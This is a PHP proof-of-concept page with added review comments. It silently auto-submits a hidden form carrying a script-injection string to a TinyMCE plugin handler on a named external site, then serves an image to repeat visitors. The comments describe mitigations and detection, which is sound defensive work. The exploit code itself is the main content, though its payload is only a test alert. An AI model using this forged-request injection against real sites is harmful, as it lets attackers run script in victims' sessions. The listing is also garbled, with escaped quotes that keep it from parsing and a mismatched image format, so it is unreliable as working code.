<?php
// Proof-of-concept page for a script-injection issue reached through a
// cross-site POST: on a visitor's first request it emits an HTML form that the
// browser submits automatically to the TinyMCE "typograf" plugin handler on
// the target site; on later requests it answers with an image instead.
//
// NOTE(review): every quote in this listing is backslash-escaped (\' and \"),
// which looks like an artifact of how the listing was pasted; as shown, the
// file would not parse as PHP.
//
// Defensive reading (handler.php is not shown here, so confirm against its source):
//   - The page only matters if the handler accepts a POST that originates from
//     another site and reflects the `text` field into an HTML response without
//     encoding it.
//   - Handler-side mitigations: HTML-encode `text` on output (htmlspecialchars
//     with ENT_QUOTES), require an anti-CSRF token or validate Origin/Referer,
//     and limit the endpoint to authenticated editor sessions.
//   - Detection: POSTs to the plugin handler whose Origin/Referer is a foreign
//     site, or whose `text` body contains markup such as <script>.

// URL-encoded <script> test string; apparently meant for the form's `text` field below.
$value = urlencode("<script>alert(\'Hello\');</script>\");
// ?unset=time removes 'time' from $_COOKIE for this request only (the browser's
// cookie is untouched), which forces the form branch below to run again.
// $_GET['unset'] is read without isset(), so a request lacking it raises an
// undefined-index notice/warning.
if($_GET[\'unset\'] == \"time\") unset($_COOKIE[\'time\']);
// First visit (no 'time' cookie): set a one-hour marker cookie, then emit the
// auto-submitting form.
if(!isset($_COOKIE[\'time\']))
{
setcookie(\"time\",time(),time()+3600);
?>
<head>
</head>
<body>
<center>
<form name=\"hack\" action=\"http://dlesite.ru/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php\" method=\"post\">
<input type=\"text\" name=\"text\" value=\'$value\' style=\"boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;\" border=\"0\">
</form>
<script>
document.hack.submit();
</script>
</body>
</html>
<?
// Short open tag above: only treated as PHP when short_open_tag is enabled.
}
else {
// Repeat visit while the 'time' cookie is present: respond with an image
// rather than the form.
// NOTE(review): the header declares image/jpg and the file is named smile.jpg,
// but it is loaded with imagecreatefromgif() and written with imagegif(), so
// the bytes sent are GIF. If the file is really a JPEG the load presumably
// fails and imagegif() receives false. The return value is not checked.
header(\"Content-type: image/jpg\");
$image = imagecreatefromgif(\'smile.jpg\');
imagegif($image);
imagedestroy($image);
}
?>